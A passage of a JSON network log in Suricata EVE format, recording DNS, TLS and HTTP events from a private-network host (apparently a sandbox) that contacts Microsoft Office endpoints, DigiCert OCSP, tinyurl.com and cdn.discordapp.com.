"rrname":"c.6.7.2.0.d.f.5.d.0.e.a.1.c.5.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":28119
},
"flow_id":523663433219894,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":64248,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":75,
"timestamp":"2020-12-09T15:53:29.620766+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"7.2.3.3.1.6.3.3.0.7.6.3.a.f.1.9.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"ip6.arpa",
"ttl":3597
}
],
"type":"answer",
"id":21149
},
"flow_id":655368605249208,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":59575,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":151,
"timestamp":"2020-12-09T15:53:32.209949+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"105.56.168.192.in-addr.arpa",
"type":"query",
"id":40699
},
"flow_id":1315462129136669,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":57211,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":90,
"timestamp":"2020-12-09T15:53:30.121233+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"2.b.3.e.7.4.f.3.7.5.d.0.a.d.c.f.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"ip6.arpa",
"ttl":3598
}
],
"type":"answer",
"id":60444
},
"flow_id":1016171627941550,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":51865,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":176,
"timestamp":"2020-12-09T15:53:33.668635+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"officeclient.microsoft.com",
"type":"query",
"id":14384
},
"flow_id":950072081462235,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":58700,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":152,
"timestamp":"2020-12-09T15:53:32.210133+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"c.6.7.2.0.d.f.5.d.0.e.a.1.c.5.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":28119
},
"flow_id":1918664516056277,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":51865,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":186,
"timestamp":"2020-12-09T15:53:34.662282+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"officeclient.microsoft.com",
"type":"query",
"id":14384
},
"flow_id":2023689351469834,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49366,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":179,
"timestamp":"2020-12-09T15:53:33.816840+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"tinyurl.com",
"type":"query",
"id":2133
},
"flow_id":215048558311112,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":60001,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":180,
"timestamp":"2020-12-09T15:53:34.201728+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"103.56.168.192.in-addr.arpa",
"type":"query",
"id":23996
},
"flow_id":2203038595814400,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":59575,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":153,
"timestamp":"2020-12-09T15:53:32.252676+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"105.56.168.192.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"type":"answer",
"id":40699
},
"flow_id":1315462129136669,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49366,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":192,
"timestamp":"2020-12-09T15:53:34.802829+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"tinyurl.com",
"type":"query",
"id":2133
},
"flow_id":1883243920900109,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":58700,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":157,
"timestamp":"2020-12-09T15:53:32.261913+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"c.6.7.2.0.d.f.5.d.0.e.a.1.c.5.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"ip6.arpa",
"ttl":3598
}
],
"type":"answer",
"id":28119
},
"flow_id":1918664516056277,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":55622,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":245,
"timestamp":"2020-12-09T15:53:35.193670+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"d.5.e.3.c.c.d.5.1.4.5.0.2.6.1.f.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":54385
},
"flow_id":379558690813062,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":65341,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":247,
"timestamp":"2020-12-09T15:53:35.205583+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"68.76.109.52.in-addr.arpa",
"type":"query",
"id":46228
},
"flow_id":1792525621732111,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":55622,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":181,
"timestamp":"2020-12-09T15:53:34.202008+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"d.5.e.3.c.c.d.5.1.4.5.0.2.6.1.f.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":54385
},
"flow_id":275014891738392,
"dest_port":53,
"dest_ip":"192.168.56.1"
},
{
"src_port":60001,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":246,
"timestamp":"2020-12-09T15:53:35.193772+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"103.56.168.192.in-addr.arpa",
"type":"query",
"id":23996
},
"flow_id":586730733303020,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49366,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":193,
"timestamp":"2020-12-09T15:53:34.855341+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"tinyurl.com",
"answers":[
{
"rrtype":"A",
"rrname":"tinyurl.com",
"rdata":"104.20.139.65",
"ttl":282
},
{
"rrtype":"A",
"rrname":"tinyurl.com",
"rdata":"172.67.1.225",
"ttl":282
},
{
"rrtype":"A",
"rrname":"tinyurl.com",
"rdata":"104.20.138.65",
"ttl":282
}
],
"rd":true,
"grouped":{
"A":[
"104.20.139.65",
"172.67.1.225",
"104.20.138.65"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":2133
},
"flow_id":1883243920900109,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":55622,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":259,
"timestamp":"2020-12-09T15:53:35.246219+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"d.5.e.3.c.c.d.5.1.4.5.0.2.6.1.f.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"ip6.arpa",
"ttl":3598
}
],
"type":"answer",
"id":54385
},
"flow_id":379558690813062,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":58699,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":298,
"timestamp":"2020-12-09T15:53:37.201468+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"8.2.d.2.a.8.6.8.b.e.0.4.c.9.c.7.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"type":"query",
"id":55438
},
"flow_id":1652861875327740,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":60001,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":251,
"timestamp":"2020-12-09T15:53:35.236452+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"103.56.168.192.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"type":"answer",
"id":23996
},
"flow_id":586730733303020,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":52067,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":299,
"timestamp":"2020-12-09T15:53:37.201990+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"106.56.168.192.in-addr.arpa",
"type":"query",
"id":44741
},
"flow_id":1617419805201670,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":65341,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":263,
"timestamp":"2020-12-09T15:53:35.257970+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"68.76.109.52.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"76.109.52.in-addr.arpa",
"ttl":15
}
],
"type":"answer",
"id":46228
},
"flow_id":1792525621732111,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":58699,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":307,
"timestamp":"2020-12-09T15:53:37.253322+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"8.2.d.2.a.8.6.8.b.e.0.4.c.9.c.7.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"ip6.arpa",
"ttl":3593
}
],
"type":"answer",
"id":55438
},
"flow_id":1652861875327740,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49531,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":316,
"timestamp":"2020-12-09T15:53:37.776981+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"nexus.officeapps.live.com",
"type":"query",
"id":22380
},
"flow_id":429376016603925,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":52067,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":300,
"timestamp":"2020-12-09T15:53:37.244548+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"106.56.168.192.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"type":"answer",
"id":44741
},
"flow_id":1617419805201670,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":51865,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":187,
"timestamp":"2020-12-09T15:53:34.714411+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"officeclient.microsoft.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"officeclient.microsoft.com",
"rdata":"config.officeapps.live.com",
"ttl":35
},
{
"rrtype":"CNAME",
"rrname":"config.officeapps.live.com",
"rdata":"prod.configsvc1.live.com.akadns.net",
"ttl":3054
},
{
"rrtype":"CNAME",
"rrname":"prod.configsvc1.live.com.akadns.net",
"rdata":"europe.configsvc1.live.com.akadns.net",
"ttl":212
},
{
"rrtype":"A",
"rrname":"europe.configsvc1.live.com.akadns.net",
"rdata":"52.109.76.68",
"ttl":17
}
],
"rd":true,
"grouped":{
"A":[
"52.109.76.68"
],
"CNAME":[
"config.officeapps.live.com",
"prod.configsvc1.live.com.akadns.net",
"europe.configsvc1.live.com.akadns.net"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":14384
},
"flow_id":2023689351469834,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"tls":{
"notbefore":"2020-08-03T00:00:00",
"issuerdn":"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2",
"ja3":{
},
"sni":"tinyurl.com",
"version":"TLSv1",
"fingerprint":"e3:e3:99:52:4c:27:32:02:06:36:ef:fc:74:fa:1d:4e:2e:0f:a1:5f",
"serial":"0E:40:49:0C:55:32:D2:F1:FF:B6:D2:C9:17:38:42:AA",
"notafter":"2021-08-03T12:00:00",
"ja3s":{
},
"subject":"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com"
},
"src_port":49175,
"event_type":"tls",
"proto":"TCP",
"pcap_cnt":208,
"timestamp":"2020-12-09T15:53:34.931242+0100",
"src_ip":"192.168.56.104",
"flow_id":435814172332133,
"dest_port":443,
"dest_ip":"104.20.139.65"
},
{
"src_port":52691,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":330,
"timestamp":"2020-12-09T15:53:38.195266+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"21.12.109.52.in-addr.arpa",
"type":"query",
"id":14178
},
"flow_id":1050638741076674,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":49531,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":317,
"timestamp":"2020-12-09T15:53:37.829022+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"nexus.officeapps.live.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"nexus.officeapps.live.com",
"rdata":"prod-w.nexus.live.com.akadns.net",
"ttl":34
},
{
"rrtype":"A",
"rrname":"prod-w.nexus.live.com.akadns.net",
"rdata":"52.109.12.21",
"ttl":194
}
],
"rd":true,
"grouped":{
"A":[
"52.109.12.21"
],
"CNAME":[
"prod-w.nexus.live.com.akadns.net"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":22380
},
"flow_id":429376016603925,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":56090,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":361,
"timestamp":"2020-12-09T15:53:40.148785+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"ocsp.digicert.com",
"type":"query",
"id":10934
},
"flow_id":193212945024305,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":52691,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":333,
"timestamp":"2020-12-09T15:53:38.247120+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"21.12.109.52.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"12.109.52.in-addr.arpa",
"ttl":21
}
],
"type":"answer",
"id":14178
},
"flow_id":1050638741076674,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":53506,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":381,
"timestamp":"2020-12-09T15:53:40.945565+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"nexusrules.officeapps.live.com",
"type":"query",
"id":20926
},
"flow_id":1712321402793373,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"tls":{
"notbefore":"2020-10-06T22:50:35",
"issuerdn":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02",
"ja3":{
},
"sni":"officeclient.microsoft.com",
"version":"TLSv1",
"fingerprint":"04:de:6a:ee:ef:54:99:e0:fc:f0:83:23:f8:ba:0e:48:6c:89:6e:d4",
"serial":"7F:00:00:64:E3:25:38:F4:38:85:23:A6:4E:00:00:00:00:64:E3",
"notafter":"2021-10-06T22:50:35",
"ja3s":{
},
"subject":"CN=config.officeapps.live.com"
},
"src_port":49174,
"event_type":"tls",
"proto":"TCP",
"pcap_cnt":199,
"timestamp":"2020-12-09T15:53:34.859534+0100",
"src_ip":"192.168.56.104",
"flow_id":265754942302926,
"dest_port":443,
"dest_ip":"52.109.76.68"
},
{
"src_port":56090,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":362,
"timestamp":"2020-12-09T15:53:40.191389+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"ocsp.digicert.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"ocsp.digicert.com",
"rdata":"cs9.wac.phicdn.net",
"ttl":19226
},
{
"rrtype":"A",
"rrname":"cs9.wac.phicdn.net",
"rdata":"93.184.220.29",
"ttl":2729
}
],
"rd":true,
"grouped":{
"A":[
"93.184.220.29"
],
"CNAME":[
"cs9.wac.phicdn.net"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":10934
},
"flow_id":193212945024305,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":62098,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":452,
"timestamp":"2020-12-09T15:53:46.027041+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"cdn.discordapp.com",
"type":"query",
"id":52572
},
"flow_id":552980880976289,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":53506,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":382,
"timestamp":"2020-12-09T15:53:41.052884+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"nexusrules.officeapps.live.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"nexusrules.officeapps.live.com",
"rdata":"prod.nexusrules.live.com.akadns.net",
"ttl":2814
},
{
"rrtype":"A",
"rrname":"prod.nexusrules.live.com.akadns.net",
"rdata":"52.109.76.32",
"ttl":299
}
],
"rd":true,
"grouped":{
"A":[
"52.109.76.32"
],
"CNAME":[
"prod.nexusrules.live.com.akadns.net"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":20926
},
"flow_id":1712321402793373,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"tls":{
"notbefore":"2020-10-06T22:48:55",
"issuerdn":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02",
"ja3":{
},
"sni":"nexusrules.officeapps.live.com",
"version":"TLSv1",
"fingerprint":"fa:10:61:47:07:3c:4f:2b:31:3c:22:a0:51:5b:1b:bb:42:2d:a8:9c",
"serial":"7F:00:00:64:CF:73:80:B0:A5:DD:93:A7:89:00:00:00:00:64:CF",
"notafter":"2021-10-06T22:48:55",
"ja3s":{
},
"subject":"CN=nexusrules.officeapps.live.com"
},
"src_port":49178,
"event_type":"tls",
"proto":"TCP",
"pcap_cnt":391,
"timestamp":"2020-12-09T15:53:41.197185+0100",
"src_ip":"192.168.56.104",
"flow_id":393706313470450,
"dest_port":443,
"dest_ip":"52.109.76.32"
},
{
"src_port":49177,
"event_type":"http",
"proto":"TCP",
"pcap_cnt":374,
"timestamp":"2020-12-09T15:53:40.278295+0100",
"src_ip":"192.168.56.104",
"tx_id":0,
"flow_id":1468968555835339,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D",
"hostname":"ocsp.digicert.com",
"length":1507,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"dest_port":80,
"dest_ip":"93.184.220.29"
},
{
"src_port":50099,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":393,
"timestamp":"2020-12-09T15:53:41.204037+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"29.220.184.93.in-addr.arpa",
"type":"query",
"id":33367
},
"flow_id":703708462914821,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":61505,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":394,
"timestamp":"2020-12-09T15:53:41.204509+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"32.76.109.52.in-addr.arpa",
"type":"query",
"id":33931
},
"flow_id":1555615226076893,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":80,
"event_type":"fileinfo",
"proto":"TCP",
"pcap_cnt":374,
"timestamp":"2020-12-09T15:53:40.278295+0100",
"app_proto":"http",
"src_ip":"93.184.220.29",
"flow_id":1468968555835339,
"http":{
"status":200,
"http_user_agent":"Microsoft-CryptoAPI/6.1",
"protocol":"HTTP/1.1",
"url":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc%3D",
"hostname":"ocsp.digicert.com",
"length":1507,
"http_method":"GET",
"http_content_type":"application/ocsp-response"
},
"fileinfo":{
"filename":"/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom/nYB45SPUEwQU5Z1ZMIJHWMys+ghUNoZ7OrUETfACEALYmhVz87O42hRbWDiYKQc=",
"tx_id":0,
"state":"CLOSED",
"stored":false,
"gaps":false,
"sid":[
],
"size":1507
},
"dest_port":49177,
"dest_ip":"192.168.56.104"
},
{
"src_port":50099,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":396,
"timestamp":"2020-12-09T15:53:41.246804+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"29.220.184.93.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"220.184.93.in-addr.arpa",
"ttl":158
}
],
"type":"answer",
"id":33367
},
"flow_id":703708462914821,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":62098,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":453,
"timestamp":"2020-12-09T15:53:46.069611+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"cdn.discordapp.com",
"answers":[
{
"rrtype":"A",
"rrname":"cdn.discordapp.com",
"rdata":"162.159.130.233",
"ttl":250
},
{
"rrtype":"A",
"rrname":"cdn.discordapp.com",
"rdata":"162.159.129.233",
"ttl":250
},
{
"rrtype":"A",
"rrname":"cdn.discordapp.com",
"rdata":"162.159.134.233",
"ttl":250
},
{
"rrtype":"A",
"rrname":"cdn.discordapp.com",
"rdata":"162.159.135.233",
"ttl":250
},
{
"rrtype":"A",
"rrname":"cdn.discordapp.com",
"rdata":"162.159.133.233",
"ttl":250
}
],
"rd":true,
"grouped":{
"A":[
"162.159.130.233",
"162.159.129.233",
"162.159.134.233",
"162.159.135.233",
"162.159.133.233"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":52572
},
"flow_id":552980880976289,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":61505,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":398,
"timestamp":"2020-12-09T15:53:41.256368+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"32.76.109.52.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"76.109.52.in-addr.arpa",
"ttl":10
}
],
"type":"answer",
"id":33931
},
"flow_id":1555615226076893,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":61049,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":501,
"timestamp":"2020-12-09T15:53:51.336474+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"www.download.windowsupdate.com",
"type":"query",
"id":14220
},
"flow_id":1481492681138778,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":55406,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":607,
"timestamp":"2020-12-09T15:53:57.105691+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"A",
"rrname":"www.microsoft.com",
"type":"query",
"id":58270
},
"flow_id":82866646392027,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":64961,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":623,
"timestamp":"2020-12-09T15:53:58.196294+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"14.174.34.23.in-addr.arpa",
"type":"query",
"id":23864
},
"flow_id":679837035855558,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"tls":{
"notbefore":"2020-10-02T21:28:21",
"issuerdn":"C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01",
"ja3":{
},
"sni":"nexus.officeapps.live.com",
"version":"TLSv1",
"fingerprint":"7b:00:e2:a3:8c:b3:2b:b9:f6:df:cc:37:7a:ed:6b:48:e9:0b:c1:3b",
"serial":"6B:00:00:56:75:21:F4:B7:C1:DE:1C:28:F6:00:00:00:00:56:75",
"notafter":"2021-10-02T21:28:21",
"ja3s":{
},
"subject":"CN=nexus.officeapps.live.com"
},
"src_port":49176,
"event_type":"tls",
"proto":"TCP",
"pcap_cnt":329,
"timestamp":"2020-12-09T15:53:38.102061+0100",
"src_ip":"192.168.56.104",
"flow_id":1898383680842072,
"dest_port":443,
"dest_ip":"52.109.12.21"
},
{
"src_port":59140,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":469,
"timestamp":"2020-12-09T15:53:46.199818+0100",
"src_ip":"192.168.56.104",
"dns":{
"tx_id":0,
"rrtype":"PTR",
"rrname":"233.130.159.162.in-addr.arpa",
"type":"query",
"id":10720
},
"flow_id":2250334776462474,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":61049,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":502,
"timestamp":"2020-12-09T15:53:51.398696+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NOERROR",
"rrtype":"A",
"rrname":"www.download.windowsupdate.com",
"answers":[
{
"rrtype":"CNAME",
"rrname":"www.download.windowsupdate.com",
"rdata":"wu-fg-shim.trafficmanager.net",
"ttl":2609
},
{
"rrtype":"CNAME",
"rrname":"wu-fg-shim.trafficmanager.net",
"rdata":"2-01-3cf7-0009.cdx.cedexis.net",
"ttl":3505
},
{
"rrtype":"CNAME",
"rrname":"2-01-3cf7-0009.cdx.cedexis.net",
"rdata":"download.windowsupdate.com.edgesuite.net",
"ttl":148
},
{
"rrtype":"CNAME",
"rrname":"download.windowsupdate.com.edgesuite.net",
"rdata":"a767.dspw65.akamai.net",
"ttl":737
},
{
"rrtype":"A",
"rrname":"a767.dspw65.akamai.net",
"rdata":"184.28.22.50",
"ttl":19
},
{
"rrtype":"A",
"rrname":"a767.dspw65.akamai.net",
"rdata":"184.28.22.24",
"ttl":19
}
],
"rd":true,
"grouped":{
"A":[
"184.28.22.50",
"184.28.22.24"
],
"CNAME":[
"wu-fg-shim.trafficmanager.net",
"2-01-3cf7-0009.cdx.cedexis.net",
"download.windowsupdate.com.edgesuite.net",
"a767.dspw65.akamai.net"
]
},
"version":2,
"flags":"8180",
"ra":true,
"type":"answer",
"id":14220
},
"flow_id":1481492681138778,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":59140,
"event_type":"dns",
"proto":"UDP",
"pcap_cnt":473,
"timestamp":"2020-12-09T15:53:46.251291+0100",
"src_ip":"192.168.56.104",
"dns":{
"qr":true,
"rcode":"NXDOMAIN",
"rrtype":"PTR",
"rrname":"233.130.159.162.in-addr.arpa",
"rd":true,
"version":2,
"flags":"8183",
"ra":true,
"authorities":[
{
"rrtype":"SOA",
"rrname":"159.162.in-addr.arpa",
"ttl":1743
}
],
"type":"answer",
"id":10720
},
"flow_id":2250334776462474,
"dest_port":53,
"dest_ip":"8.8.8.8"
},
{
"src_port":64961,
"event_type":"dns",
